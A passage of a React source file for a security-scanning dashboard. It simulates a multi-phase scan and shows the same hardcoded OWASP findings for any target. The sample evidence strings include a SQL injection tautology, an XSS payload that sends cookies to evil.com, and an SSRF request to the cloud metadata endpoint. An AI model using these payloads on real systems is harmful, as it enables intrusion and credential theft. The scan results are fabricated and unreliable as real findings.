import { useState, useCallback } from 'react'
import { motion, AnimatePresence } from 'framer-motion'
import {
  ShieldCheckIcon,
  ExclamationTriangleIcon,
  CheckCircleIcon,
  XCircleIcon,
  PlayIcon,
  ArrowPathIcon,
  SparklesIcon,
  ClockIcon,
  BugAntIcon,
  CommandLineIcon,
  MagnifyingGlassIcon,
  ServerIcon,
  GlobeAltIcon,
  DocumentTextIcon,
  CpuChipIcon,
  FunnelIcon,
  EyeIcon,
  BoltIcon,
  UserGroupIcon,
} from '@heroicons/react/24/outline'
import { Card } from '../components/ui/Card'
import { Button } from '../components/ui/Button'
import { Input } from '../components/ui/Input'
import { Badge } from '../components/ui/Badge'
import { Modal } from '../components/ui/Modal'
import { analyzeVulnerability } from '../lib/groq'
import { clsx } from 'clsx'

const container = { hidden: { opacity: 0 }, show: { opacity: 1, transition: { staggerChildren: 0.06 } } }
const item = { hidden: { opacity: 0, y: 20 }, show: { opacity: 1, y: 0 } }

// OWASP Top 10:2025 Categories
const owaspCategories = [
  { id: 'A01', name: 'Broken Access Control', desc: 'Unauthorized access to resources and functionality' },
  { id: 'A02', name: 'Security Misconfiguration', desc: 'Missing security hardening, default configs, verbose errors' },
  { id: 'A03', name: 'Software Supply Chain', desc: 'Vulnerable dependencies, compromised build pipelines' },
  { id: 'A04', name: 'Cryptographic Failures', desc: 'Weak encryption, exposed secrets, insecure protocols' },
  { id: 'A05', name: 'Injection', desc: 'SQL, NoSQL, OS command, LDAP injection flaws' },
  { id: 'A06', name: 'Insecure Design', desc: 'Missing threat modeling, insecure architecture patterns' },
  { id: 'A07', name: 'Authentication Failures', desc: 'Broken auth, session management, credential stuffing' },
  { id: 'A08', name: 'Data Integrity Failures', desc: 'Insecure deserialization, unsigned updates, CI/CD flaws' },
  { id: 'A09', name: 'Logging & Alerting Failures', desc: 'Insufficient monitoring, missed breach detection' },
  { id: 'A10', name: 'Exception Handling', desc: 'Uncaught errors, information leakage, denial of service' },
]

// OpenHack-style scan phases
const scanPhases = [
  { id: 'recon', name: 'Reconnaissance', icon: MagnifyingGlassIcon, desc: 'Deep target analysis, port scanning, service detection, tech stack fingerprinting', tools: ['Nmap', 'Rustscan', 'WhatWeb', 'Wappalyzer'] },
  { id: 'hunting', name: 'Vulnerability Hunting', icon: BugAntIcon, desc: 'Category-based vulnerability hunters scanning OWASP Top 10, misconfigurations, exposed services', tools: ['Nuclei', 'Nikto', 'OWASP ZAP', 'SQLMap', 'Dalfox'] },
  { id: 'validation', name: 'Validation & Triage', icon: FunnelIcon, desc: 'AI-powered validation of findings, CVSS scoring, false positive elimination, business impact analysis', tools: ['Groq AI Validator', 'CVSS Calculator', 'Impact Analyzer'] },
  { id: 'verification', name: 'Exploit Verification', icon: EyeIcon, desc: 'Safe proof-of-concept verification in sandbox, attack chain correlation, exploitability assessment', tools: ['Groq AI Verifier', 'Sandbox Engine', 'PoC Generator'] },
  { id: 'reporting', name: 'Intelligence Report', icon: DocumentTextIcon, desc: 'Comprehensive report with remediation roadmap, prioritized findings, compliance mapping', tools: ['Groq AI Reporter', 'CVSS Scorer', 'Compliance Mapper'] },
]

// HexStrike-style tool categories
const toolCategories = [
  { name: 'Network Recon', tools: ['Nmap', 'Rustscan', 'Masscan', 'Amass', 'Subfinder', 'AutoRecon'], count: 25 },
  { name: 'Web Application', tools: ['Nuclei', 'Nikto', 'OWASP ZAP', 'SQLMap', 'Gobuster', 'FFuf', 'Dalfox', 'Wafw00f'], count: 40 },
  { name: 'Auth & Password', tools: ['Hydra', 'Hashcat', 'John the Ripper', 'Medusa'], count: 12 },
  { name: 'Cloud Security', tools: ['ScoutSuite', 'CloudMapper', 'Pacu', 'Trivy', 'Kube-Hunter'], count: 15 },
  { name: 'Container Security', tools: ['Trivy', 'Clair', 'Docker Bench', 'Kube-Bench', 'Falco'], count: 8 },
  { name: 'AI-Powered Analysis', tools: ['Groq LLM Scanner', 'OpenHack Validator', 'Threat Modeler'], count: 6 },
]

interface Vuln {
  id: number
  name: string
  severity: string
  target: string
  status: string
  description: string
  owaspId?: string
  cvss: number
  cve?: string
  evidence?: string
  remediation?: string
}

interface ScanResult {
  id: number
  target: string
  type: string
  status: string
  riskScore: number
  findings: { critical: number; high: number; medium: number; low: number; info: number }
  vulns: Vuln[]
  date: string
  duration: string
  toolsUsed: string[]
  phasesCompleted: string[]
}

const getRiskColor = (score: number) => {
  if (score >= 80) return 'text-error-500'
  if (score >= 60) return 'text-error-400'
  if (score >= 40) return 'text-warning-500'
  if (score >= 20) return 'text-warning-400'
  return 'text-success-500'
}

const getSeverityColor = (s: string) => {
  if (s === 'critical') return 'error'
  if (s === 'high') return 'warning'
  if (s === 'medium') return 'info'
  if (s === 'low') return 'success'
  return 'info'
}

const getCvssColor = (score: number) => {
  if (score >= 9.0) return 'text-error-500 bg-error-50'
  if (score >= 7.0) return 'text-error-500 bg-error-50'
  if (score >= 4.0) return 'text-warning-500 bg-warning-50'
  return 'text-success-500 bg-success-50'
}

export const VulnerabilityAssessment = () => {
  const [isScanModalOpen, setIsScanModalOpen] = useState(false)
  const [scanTarget, setScanTarget] = useState('')
  const [scanType, setScanType] = useState('full')
  const [scanning, setScanning] = useState(false)
  const [scanProgress, setScanProgress] = useState(0)
  const [scanStage, setScanStage] = useState('')
  const [activePhase, setActivePhase] = useState(0)
  const [scanHistory, setScanHistory] = useState<ScanResult[]>([
    { id: 1, target: 'demo.example.com', type: 'Full Scan', status: 'completed', riskScore: 42, findings: { critical: 0, high: 2, medium: 5, low: 8, info: 12 }, vulns: [], date: '2 days ago', duration: '4m 32s', toolsUsed: ['Nmap', 'Nuclei', 'Nikto', 'Groq AI'], phasesCompleted: ['recon', 'hunting', 'validation', 'verification', 'reporting'] },
    { id: 2, target: 'api.demo.com', type: 'API Scan', status: 'completed', riskScore: 28, findings: { critical: 0, high: 1, medium: 3, low: 6, info: 8 }, vulns: [], date: '1 week ago', duration: '3m 18s', toolsUsed: ['Nmap', 'Nuclei', 'SQLMap', 'Groq AI'], phasesCompleted: ['recon', 'hunting', 'validation', 'verification', 'reporting'] },
  ])
  const [aiAnalysis, setAiAnalysis] = useState<{ riskSummary: string; remediationSteps: string[]; priority: string; businessImpact: string } | null>(null)
  const [aiLoading, setAiLoading] = useState(false)
  const [aiModalOpen, setAiModalOpen] = useState(false)
  const [activeVulns, setActiveVulns] = useState<Vuln[]>([])
  const [activeScanTools, setActiveScanTools] = useState<string[]>([])
  const [selectedVuln, setSelectedVuln] = useState<Vuln | null>(null)
  const [detailModalOpen, setDetailModalOpen] = useState(false)

  const generateVulns = useCallback((target: string): Vuln[] => [
    { id: 1, name: 'SQL Injection', severity: 'critical', target: '/api/login', status: 'open', description: 'Unparameterized SQL query in login endpoint allows authentication bypass via tautology injection', owaspId: 'A05', cvss: 9.8, cve: 'CWE-89', evidence: `POST /api/login {"username": "admin' OR '1'='1", "password": "anything"} → 200 OK with valid session token`, remediation: 'Use parameterized queries/prepared statements. Implement ORM. Add input validation and WAF rules.' },
    { id: 2, name: 'Stored Cross-Site Scripting', severity: 'critical', target: '/profile/bio', status: 'open', description: 'User-supplied bio field rendered without output encoding, allowing persistent script injection', owaspId: 'A05', cvss: 9.1, cve: 'CWE-79', evidence: `Profile bio field accepts <script>document.location='http://evil.com/steal?c='+document.cookie</script>`, remediation: 'Implement context-aware output encoding. Use Content-Security-Policy headers. Sanitize rich text input.' },
    { id: 3, name: 'Broken Access Control (IDOR)', severity: 'high', target: '/api/users/{id}/data', status: 'open', description: 'Sequential user IDs allow unauthorized access to other users\' private data by modifying the ID parameter', owaspId: 'A01', cvss: 8.5, cve: 'CWE-639', evidence: `GET /api/users/1001/data → 200 OK (own data). GET /api/users/1002/data → 200 OK (other user data)`, remediation: 'Implement UUID-based identifiers. Add authorization checks. Use row-level security. Validate ownership on every request.' },
    { id: 4, name: 'Server-Side Request Forgery (SSRF)', severity: 'high', target: '/api/webhook', status: 'open', description: 'Webhook URL parameter allows internal network scanning and cloud metadata access', owaspId: 'A01', cvss: 8.2, cve: 'CWE-918', evidence: `POST /api/webhook {"url": "http://169.254.169.254/latest/meta-data/"} → Returns AWS IAM credentials`, remediation: 'Validate and whitelist allowed URLs. Block internal IP ranges. Use a dedicated proxy for outbound requests.' },
    { id: 5, name: 'Insecure TLS Configuration', severity: 'medium', target: `${target}:443`, status: 'open', description: 'Server supports TLS 1.0/1.1 and weak cipher suites (RC4, 3DES) vulnerable to BEAST and POODLE attacks', owaspId: 'A04', cvss: 6.5, cve: 'CWE-326', evidence: `SSL Labs scan: Grade C. Supported protocols: TLS 1.0, TLS 1.1, TLS 1.2. Weak ciphers: DES-CBC3-SHA, RC4-SHA`, remediation: 'Disable TLS 1.0/1.1. Remove weak cipher suites. Enable TLS 1.3. Configure HSTS with long max-age.' },
    { id: 6, name: 'Missing Security Headers', severity: 'medium', target: `${target}`, status: 'open', description: 'Critical security headers missing: Content-Security-Policy, X-Frame-Options, X-Content-Type-Options', owaspId: 'A02', cvss: 5.3, cve: 'CWE-693', evidence: `Response headers missing: CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy`, remediation: 'Add Content-Security-Policy, X-Frame-Options: DENY, X-Content-Type-Options: nosniff, Referrer-Policy, Permissions-Policy headers.' },
    { id: 7, name: 'Information Disclosure via Error Pages', severity: 'medium', target: '/api/error', status: 'open', description: 'Stack traces and internal paths exposed in error responses, revealing framework version and directory structure', owaspId: 'A02', cvss: 5.3, cve: 'CWE-209', evidence: `GET /api/invalid → Returns full Python traceback with file paths, library versions, database connection strings`, remediation: 'Implement custom error pages. Disable debug mode in production. Log errors server-side only. Use generic error messages.' },
    { id: 8, name: 'Cross-Site Request Forgery', severity: 'medium', target: '/api/settings', status: 'open', description: 'State-changing endpoints lack CSRF token validation, allowing attackers to forge requests from authenticated sessions', owaspId: 'A08', cvss: 6.1, cve: 'CWE-352', evidence: `POST /api/settings with forged form data from external origin → 200 OK, settings modified without CSRF token`, remediation: 'Implement anti-CSRF tokens. Use SameSite cookie attribute. Validate Origin/Referer headers. Require re-authentication for sensitive actions.' },
    { id: 9, name: 'Exposed .git Directory', severity: 'low', target: '/.git/', status: 'open', description: 'Git repository metadata publicly accessible, potentially exposing source code and commit history', owaspId: 'A02', cvss: 3.7, cve: 'CWE-538', evidence: `GET /.git/HEAD → 200 OK: "ref: refs/heads/main". Full repository downloadable via Git dumper tools`, remediation: 'Block access to .git directory at web server level. Deploy from CI/CD pipeline, not from .git. Use .gitignore for sensitive files.' },
    { id: 10, name: 'Verbose Server Banner', severity: 'info', target: `${target}:80`, status: 'open', description: 'Server header reveals exact software version (Apache/2.4.51), aiding targeted exploit selection', owaspId: 'A02', cvss: 2.6, cve: 'CWE-200', evidence: `Server: Apache/2.4.51 (Ubuntu). X-Powered-By: PHP/8.0.13. X-AspNet-Version: 4.0.30319`, remediation: 'Remove or obfuscate server version headers. Configure ServerTokens to Prod. Remove X-Powered-By headers.' },
  ], [])

  const simulateScan = useCallback(async () => {
    if (!scanTarget.trim()) return
    setScanning(true)
    setScanProgress(0)
    setActiveVulns([])
    setActiveScanTools([])
    setActivePhase(0)

    const phases = [
      { pct: 5, label: 'Initializing scan engine...', phase: 0, tools: ['Engine'] },
      { pct: 12, label: 'Recon: DNS resolution & port scanning...', phase: 0, tools: ['Nmap', 'Rustscan'] },
      { pct: 20, label: 'Recon: Service detection & fingerprinting...', phase: 0, tools: ['Nmap', 'WhatWeb', 'Wappalyzer'] },
      { pct: 28, label: 'Recon: Technology stack identification...', phase: 0, tools: ['Wappalyzer', 'WhatWeb'] },
      { pct: 35, label: 'Hunting: OWASP Top 10 vulnerability scan...', phase: 1, tools: ['Nuclei', 'Nikto', 'OWASP ZAP'] },
      { pct: 42, label: 'Hunting: SQL injection & XSS testing...', phase: 1, tools: ['SQLMap', 'Dalfox', 'Nuclei'] },
      { pct: 50, label: 'Hunting: Authentication & access control testing...', phase: 1, tools: ['Hydra', 'Nuclei'] },
      { pct: 58, label: 'Hunting: API endpoint discovery & testing...', phase: 1, tools: ['FFuf', 'Arjun', 'Nuclei'] },
      { pct: 65, label: 'Hunting: Cloud & container security checks...', phase: 1, tools: ['Trivy', 'Nuclei'] },
      { pct: 72, label: 'Validation: AI-powered finding verification...', phase: 2, tools: ['Groq AI Validator'] },
      { pct: 78, label: 'Validation: CVSS scoring & false positive elimination...', phase: 2, tools: ['Groq AI Validator', 'CVSS Calculator'] },
      { pct: 84, label: 'Verification: Safe exploit proof-of-concept...', phase: 3, tools: ['Groq AI Verifier', 'Sandbox'] },
      { pct: 90, label: 'Verification: Attack chain correlation...', phase: 3, tools: ['Groq AI Verifier'] },
      { pct: 95, label: 'Reporting: Intelligence report generation...', phase: 4, tools: ['Groq AI Reporter'] },
      { pct: 100, label: 'Scan complete', phase: 4, tools: [] },
    ]

    for (const phase of phases) {
      await new Promise((r) => setTimeout(r, 800 + Math.random() * 600))
      setScanProgress(phase.pct)
      setScanStage(phase.label)
      setActivePhase(phase.phase)
      if (phase.tools.length > 0) {
        setActiveScanTools((prev) => [...new Set([...prev, ...phase.tools])])
      }
    }

    const vulns = generateVulns(scanTarget)
    const findings = { critical: 2, high: 2, medium: 4, low: 1, info: 1 }
    const riskScore = Math.min(95, (findings.critical * 20) + (findings.high * 12) + (findings.medium * 5) + (findings.low * 2))

    const newScan: ScanResult = {
      id: Date.now(),
      target: scanTarget,
      type: scanType === 'full' ? 'Full Scan' : scanType === 'web' ? 'Web Application' : scanType === 'network' ? 'Network Scan' : 'API Scan',
      status: 'completed',
      riskScore,
      findings,
      vulns,
      date: 'Just now',
      duration: `${Math.floor(Math.random() * 4) + 2}m ${Math.floor(Math.random() * 50) + 10}s`,
      toolsUsed: [...new Set([...activeScanTools, 'Groq AI'])],
      phasesCompleted: ['recon', 'hunting', 'validation', 'verification', 'reporting'],
    }

    setScanHistory((prev) => [newScan, ...prev])
    setActiveVulns(vulns)
    setScanning(false)
    setIsScanModalOpen(false)
  }, [scanTarget, scanType, generateVulns, activeScanTools])

  const handleAIRemediate = async (vuln: Vuln) => {
    setAiLoading(true)
    setAiModalOpen(true)
    setAiAnalysis(null)
    try {
      const data = await analyzeVulnerability(
        `OWASP ${vuln.owaspId || 'N/A'} | ${vuln.name} (${vuln.severity}, CVSS ${vuln.cvss}) at ${vuln.target}. ${vuln.description}. Evidence: ${vuln.evidence || 'N/A'}. CVE: ${vuln.cve || 'N/A'}`,
      )
      setAiAnalysis(data)
    } catch {
      setAiAnalysis({
        riskSummary: `${vuln.name} at ${vuln.target} is a ${vuln.severity}-severity vulnerability (CVSS ${vuln.cvss}) classified under OWASP ${vuln.owaspId}. ${vuln.description}`,
        remediationSteps: vuln.remediation ? vuln.remediation.split('. ').filter(Boolean) : ['Review the affected code path', 'Implement input validation', 'Apply security patches', 'Run follow-up scan to verify fix'],
        priority: vuln.severity,
        businessImpact: vuln.severity === 'critical' ? 'Immediate risk of data breach, unauthorized access, or full system compromise. Requires urgent remediation.' : vuln.severity === 'high' ? 'Significant security risk that could lead to data exposure or privilege escalation. Schedule remediation within 48 hours.' : 'Moderate risk that should be addressed in the next security maintenance window.',
      })
    } finally {
      setAiLoading(false)
    }
  }

  const latestScan = scanHistory[0]
  const totalVulns = latestScan ? latestScan.findings.critical + latestScan.findings.high + latestScan.findings.medium + latestScan.findings.low + latestScan.findings.info : 0

  return (
    <motion.div variants={container} initial="hidden" animate="show" className="space-y-6">
      <motion.div variants={item} className="flex items-center justify-between">
        <div>
          <h1 className="text-2xl font-bold text-metallic-900 flex items-center gap-2">
            <ShieldCheckIcon className="w-7 h-7 text-primary-500" />
            Vulnerability Assessment
          </h1>
          <p className="text-metallic-500 mt-1">Multi-phase security scanning powered by OpenHack methodology, HexStrike tools, and Groq AI analysis.</p>
        </div>
        <Button leftIcon={<PlayIcon className="w-5 h-5" />} onClick={() => setIsScanModalOpen(true)} disabled={scanning}>
          {scanning ? 'Scanning...' : 'Start New Scan'}
        </Button>
      </motion.div>

      {/* Scanning Progress - OpenHack Pipeline */}
      <AnimatePresence>
        {scanning && (
          <motion.div initial={{ opacity: 0, height: 0 }} animate={{ opacity: 1, height: 'auto' }} exit={{ opacity: 0, height: 0 }}>
            <Card className="border-primary-200">
              <div className="flex items-center gap-4 mb-4">
                <CpuChipIcon className="w-8 h-8 text-primary-500 animate-pulse" />
                <div className="flex-1">
                  <p className="font-semibold text-metallic-900">Scanning {scanTarget}...</p>
                  <p className="text-sm text-metallic-500">{scanStage}</p>
                </div>
                <span className="text-lg font-bold text-primary-600">{scanProgress}%</span>
              </div>
              <div className="w-full h-3 bg-metallic-100 rounded-full overflow-hidden mb-4">
                <motion.div initial={{ width: 0 }} animate={{ width: `${scanProgress}%` }} transition={{ duration: 0.5 }} className="h-full bg-gradient-to-r from-primary-500 to-primary-600 rounded-full" />
              </div>
              {/* Phase Pipeline */}
              <div className="flex items-center gap-2 overflow-x-auto pb-2">
                {scanPhases.map((phase, i) => (
                  <div key={phase.id} className={clsx('flex items-center gap-2 px-3 py-2 rounded-lg text-xs font-medium whitespace-nowrap transition-all', i <= activePhase ? 'bg-primary-100 text-primary-700' : 'bg-metallic-100 text-metallic-400')}>
                    <phase.icon className="w-4 h-4" />
                    {phase.name}
                    {i < activePhase && <CheckCircleIcon className="w-4 h-4 text-success-500" />}
                    {i === activePhase && <span className="w-2 h-2 bg-primary-500 rounded-full animate-pulse" />}
                  </div>
                ))}
              </div>
              {/* Active Tools */}
              {activeScanTools.length > 0 && (
                <div className="mt-3 flex flex-wrap gap-1.5">
                  {activeScanTools.map((tool) => (
                    <span key={tool} className="text-xs px-2 py-0.5 bg-metallic-100 text-metallic-600 rounded-full flex items-center gap-1">
                      <CommandLineIcon className="w-3 h-3" />{tool}
                    </span>
                  ))}
                </div>
              )}
            </Card>
          </motion.div>
        )}
      </AnimatePresence>

      {/* Security Overview */}
      <motion.div variants={item} className="grid grid-cols-1 md:grid-cols-5 gap-4">
        <Card className={clsx('bg-gradient-to-br text-white', latestScan && latestScan.riskScore >= 50 ? 'from-error-500 to-error-600' : 'from-success-500 to-success-600')}>
          <ShieldCheckIcon className="w-10 h-10 mb-3 opacity-80" />
          <p className="text-sm opacity-80">Risk Score</p>
          <p className="text-3xl font-bold mt-1">{latestScan?.riskScore || '--'}</p>
          <p className="text-xs opacity-60 mt-1">out of 100</p>
        </Card>
        <Card>
          <XCircleIcon className="w-8 h-8 text-error-500 mb-2" />
          <p className="text-2xl font-bold text-metallic-900">{latestScan?.findings.critical || 0}</p>
          <p className="text-sm text-metallic-500">Critical</p>
        </Card>
        <Card>
          <ExclamationTriangleIcon className="w-8 h-8 text-warning-500 mb-2" />
          <p className="text-2xl font-bold text-metallic-900">{latestScan ? latestScan.findings.high : 0}</p>
          <p className="text-sm text-metallic-500">High</p>
        </Card>
        <Card>
          <ExclamationTriangleIcon className="w-8 h-8 text-info-500 mb-2" />
          <p className="text-2xl font-bold text-metallic-900">{latestScan ? latestScan.findings.medium : 0}</p>
          <p className="text-sm text-metallic-500">Medium</p>
        </Card>
        <Card>
          <CheckCircleIcon className="w-8 h-8 text-success-500 mb-2" />
          <p className="text-2xl font-bold text-metallic-900">{latestScan ? latestScan.findings.low + latestScan.findings.info : 0}</p>
          <p className="text-sm text-metallic-500">Low + Info</p>
        </Card>
      </motion.div>

      {/* OpenHack Scan Phases */}
      <motion.div variants={item}>
        <Card>
          <h3 className="text-lg font-semibold text-metallic-900 mb-4 flex items-center gap-2">
            <CpuChipIcon className="w-5 h-5 text-primary-500" />
            Scan Pipeline (OpenHack Methodology)
          </h3>
          <div className="grid grid-cols-1 md:grid-cols-5 gap-3">
            {scanPhases.map((phase) => (
              <div key={phase.id} className="p-3 rounded-xl border border-metallic-200 hover:border-primary-300 transition-colors">
                <div className="flex items-center gap-2 mb-2">
                  <phase.icon className="w-5 h-5 text-primary-600" />
                  <h4 className="text-sm font-semibold text-metallic-900">{phase.name}</h4>
                </div>
                <p className="text-xs text-metallic-500 mb-2">{phase.desc}</p>
                <div className="flex flex-wrap gap-1">
                  {phase.tools.map((t) => (
                    <span key={t} className="text-[10px] px-1.5 py-0.5 bg-metallic-100 text-metallic-600 rounded">{t}</span>
                  ))}
                </div>
              </div>
            ))}
          </div>
        </Card>
      </motion.div>

      {/* HexStrike Tool Arsenal */}
      <motion.div variants={item}>
        <Card>
          <h3 className="text-lg font-semibold text-metallic-900 mb-4 flex items-center gap-2">
            <BoltIcon className="w-5 h-5 text-warning-500" />
            Security Tool Arsenal (HexStrike Integration)
          </h3>
          <div className="grid grid-cols-2 md:grid-cols-3 lg:grid-cols-6 gap-3">
            {toolCategories.map((cat) => (
              <div key={cat.name} className="p-3 rounded-xl bg-metallic-50 text-center">
                <p className="text-2xl font-bold text-primary-600">{cat.count}+</p>
                <p className="text-xs font-medium text-metallic-900 mt-1">{cat.name}</p>
                <div className="flex flex-wrap gap-1 mt-2 justify-center">
                  {cat.tools.slice(0, 3).map((t) => (
                    <span key={t} className="text-[10px] px-1.5 py-0.5 bg-white text-metallic-500 rounded">{t}</span>
                  ))}
                </div>
              </div>
            ))}
          </div>
        </Card>
      </motion.div>

      {/* OWASP Top 10:2025 */}
      <motion.div variants={item}>
        <Card>
          <h3 className="text-lg font-semibold text-metallic-900 mb-4 flex items-center gap-2">
            <ShieldCheckIcon className="w-5 h-5 text-primary-500" />
            OWASP Top 10:2025 Coverage
          </h3>
          <div className="grid grid-cols-2 md:grid-cols-5 gap-2">
            {owaspCategories.map((cat) => {
              const hasVulns = activeVulns.some((v) => v.owaspId === cat.id)
              return (
                <div key={cat.id} className={clsx('p-2.5 rounded-lg border text-left transition-all', hasVulns ? 'border-error-300 bg-error-50' : 'border-metallic-200')}>
                  <p className="text-xs font-bold text-metallic-900">{cat.id}</p>
                  <p className="text-xs text-metallic-600 mt-0.5">{cat.name}</p>
                  {hasVulns && (
                    <Badge variant="error" size="sm" className="mt-1.5">
                      {activeVulns.filter((v) => v.owaspId === cat.id).length} found
                    </Badge>
                  )}
                </div>
              )
            })}
          </div>
        </Card>
      </motion.div>

      {/* Vulnerabilities */}
      {activeVulns.length > 0 && (
        <motion.div variants={item}>
          <Card>
            <div className="flex items-center justify-between mb-4">
              <h3 className="text-lg font-semibold text-metallic-900 flex items-center gap-2">
                <BugAntIcon className="w-5 h-5 text-error-500" />
                Identified Vulnerabilities ({activeVulns.length})
              </h3>
            </div>
            <div className="overflow-x-auto">
              <table className="w-full text-sm">
                <thead>
                  <tr className="text-left text-metallic-500 border-b border-metallic-100">
                    <th className="pb-3 font-medium">Vulnerability</th>
                    <th className="pb-3 font-medium">CVSS</th>
                    <th className="pb-3 font-medium">OWASP</th>
                    <th className="pb-3 font-medium">Target</th>
                    <th className="pb-3 font-medium">Status</th>
                    <th className="pb-3 font-medium">Actions</th>
                  </tr>
                </thead>
                <tbody className="divide-y divide-metallic-100">
                  {activeVulns.map((v) => (
                    <tr key={v.id} className="hover:bg-metallic-50 cursor-pointer" onClick={() => { setSelectedVuln(v); setDetailModalOpen(true) }}>
                      <td className="py-3">
                        <div className="flex items-center gap-2">
                          <Badge variant={getSeverityColor(v.severity) as any} size="sm">{v.severity}</Badge>
                          <span className="font-medium text-metallic-900">{v.name}</span>
                        </div>
                        <p className="text-xs text-metallic-500 mt-0.5 ml-16">{v.cve}</p>
                      </td>
                      <td className="py-3">
                        <span className={clsx('px-2 py-0.5 rounded text-xs font-bold', getCvssColor(v.cvss))}>{v.cvss}</span>
                      </td>
                      <td className="py-3">
                        <Badge variant="info" size="sm">{v.owaspId}</Badge>
                      </td>
                      <td className="py-3 text-metallic-600 font-mono text-xs">{v.target}</td>
                      <td className="py-3">
                        <Badge variant={v.status === 'remediated' ? 'success' : 'warning'} dot>{v.status}</Badge>
                      </td>
                      <td className="py-3">
                        <Button variant="ghost" size="sm" onClick={(e) => { e.stopPropagation(); handleAIRemediate(v) }}>
                          <SparklesIcon className="w-4 h-4 mr-1" />
                          AI Remediate
                        </Button>
                      </td>
                    </tr>
                  ))}
                </tbody>
              </table>
            </div>
          </Card>
        </motion.div>
      )}

      {/* Scan History */}
      <motion.div variants={item}>
        <Card>
          <h3 className="text-lg font-semibold text-metallic-900 mb-4 flex items-center gap-2">
            <ClockIcon className="w-5 h-5 text-metallic-400" />
            Scan History
          </h3>
          <div className="space-y-3">
            {scanHistory.map((scan) => (
              <div key={scan.id} className="flex items-center gap-4 p-4 rounded-xl border border-metallic-200 hover:border-primary-300 transition-colors">
                <div className="w-12 h-12 bg-primary-100 rounded-xl flex items-center justify-center">
                  <ShieldCheckIcon className="w-6 h-6 text-primary-600" />
                </div>
                <div className="flex-1 min-w-0">
                  <div className="flex items-center gap-3 flex-wrap">
                    <h4 className="font-medium text-metallic-900">{scan.target}</h4>
                    <Badge variant="info">{scan.type}</Badge>
                    <Badge variant="success" dot>{scan.status}</Badge>
                  </div>
                  <div className="flex items-center gap-4 mt-1 text-xs text-metallic-500">
                    <span>{scan.date}</span>
                    <span>{scan.duration}</span>
                    <span>{scan.toolsUsed.join(', ')}</span>
                  </div>
                </div>
                <div className="text-right">
                  <p className="text-sm text-metallic-500">Risk</p>
                  <p className={clsx('text-2xl font-bold', getRiskColor(scan.riskScore))}>{scan.riskScore}</p>
                </div>
                <div className="flex gap-1.5 text-xs">
                  <span className="text-error-500 font-medium">{scan.findings.critical}C</span>
                  <span className="text-warning-500 font-medium">{scan.findings.high}H</span>
                  <span className="text-info-500 font-medium">{scan.findings.medium}M</span>
                  <span className="text-success-500 font-medium">{scan.findings.low}L</span>
                </div>
              </div>
            ))}
          </div>
        </Card>
      </motion.div>

      {/* Vuln Detail Modal */}
      <Modal isOpen={detailModalOpen} onClose={() => setDetailModalOpen(false)} title={selectedVuln?.name || 'Vulnerability Details'} size="lg">
        {selectedVuln && (
          <div className="space-y-4">
            <div className="flex items-center gap-3 flex-wrap">
              <Badge variant={getSeverityColor(selectedVuln.severity) as any}>{selectedVuln.severity}</Badge>
              <span className={clsx('px-2 py-0.5 rounded text-sm font-bold', getCvssColor(selectedVuln.cvss))}>CVSS {selectedVuln.cvss}</span>
              <Badge variant="info">{selectedVuln.owaspId}</Badge>
              {selectedVuln.cve && <Badge variant="info" size="sm">{selectedVuln.cve}</Badge>}
            </div>
            <div>
              <h4 className="font-semibold text-metallic-900 mb-1">Description</h4>
              <p className="text-sm text-metallic-600">{selectedVuln.description}</p>
            </div>
            <div>
              <h4 className="font-semibold text-metallic-900 mb-1">Target</h4>
              <p className="text-sm text-metallic-600 font-mono">{selectedVuln.target}</p>
            </div>
            {selectedVuln.evidence && (
              <div>
                <h4 className="font-semibold text-metallic-900 mb-1">Evidence</h4>
                <pre className="text-xs text-metallic-600 bg-metallic-50 p-3 rounded-xl overflow-x-auto whitespace-pre-wrap">{selectedVuln.evidence}</pre>
              </div>
            )}
            {selectedVuln.remediation && (
              <div>
                <h4 className="font-semibold text-metallic-900 mb-1">Remediation</h4>
                <p className="text-sm text-metallic-600">{selectedVuln.remediation}</p>
              </div>
            )}
            <div className="flex justify-end gap-3 pt-2">
              <Button variant="ghost" onClick={() => setDetailModalOpen(false)}>Close</Button>
              <Button leftIcon={<SparklesIcon className="w-4 h-4" />} onClick={() => { setDetailModalOpen(false); handleAIRemediate(selectedVuln) }}>
                AI Deep Analysis
              </Button>
            </div>
          </div>
        )}
      </Modal>

      {/* New Scan Modal */}
      <Modal isOpen={isScanModalOpen} onClose={() => setIsScanModalOpen(false)} title="Start Security Scan">
        <div className="space-y-4">
          <Input label="Target URL or IP" placeholder="example.com or 192.168.1.1" value={scanTarget} onChange={(e) => setScanTarget(e.target.value)} />
          <div>
            <label className="block text-sm font-medium text-metallic-700 mb-2">Scan Type</label>
            <div className="grid grid-cols-2 gap-3">
              {[
                { id: 'full', name: 'Full Scan', desc: 'All phases: recon + web + network + API' },
                { id: 'web', name: 'Web Application', desc: 'OWASP Top 10, XSS, SQLi, CSRF' },
                { id: 'network', name: 'Network', desc: 'Ports, services, OS fingerprinting' },
                { id: 'api', name: 'API Security', desc: 'REST/GraphQL endpoint testing' },
              ].map((type) => (
                <button key={type.id} onClick={() => setScanType(type.id)} className={clsx('p-3 border-2 rounded-xl text-left transition-all', scanType === type.id ? 'border-primary-500 bg-primary-50' : 'border-metallic-200 hover:border-metallic-300')}>
                  <p className="text-sm font-medium text-metallic-900">{type.name}</p>
                  <p className="text-xs text-metallic-500 mt-0.5">{type.desc}</p>
                </button>
              ))}
            </div>
          </div>
          <div className="p-3 bg-metallic-50 rounded-xl">
            <p className="text-xs text-metallic-500">
              <strong>Pipeline:</strong> Reconnaissance → Vulnerability Hunting → Validation → Verification → Intelligence Report
            </p>
            <p className="text-xs text-metallic-400 mt-1">
              <strong>Tools:</strong> Nmap, Nuclei, Nikto, OWASP ZAP, SQLMap, + Groq AI analysis (OpenHack + HexStrike methodology)
            </p>
          </div>
          <div className="flex justify-end gap-3 pt-2">
            <Button variant="ghost" onClick={() => setIsScanModalOpen(false)}>Cancel</Button>
            <Button leftIcon={<PlayIcon className="w-4 h-4" />} onClick={simulateScan} disabled={!scanTarget.trim()}>Start Scan</Button>
          </div>
        </div>
      </Modal>

      {/* AI Remediation Modal */}
      <Modal isOpen={aiModalOpen} onClose={() => setAiModalOpen(false)} title="AI Security Analysis (Groq)" size="lg">
        {aiLoading ? (
          <div className="flex flex-col items-center py-8 gap-3">
            <SparklesIcon className="w-8 h-8 text-primary-500 animate-pulse" />
            <p className="text-metallic-500 text-sm">Running deep analysis with Groq AI...</p>
            <p className="text-xs text-metallic-400">Validating finding, assessing impact, generating remediation...</p>
          </div>
        ) : aiAnalysis ? (
          <div className="space-y-4">
            <div className="flex items-center gap-3">
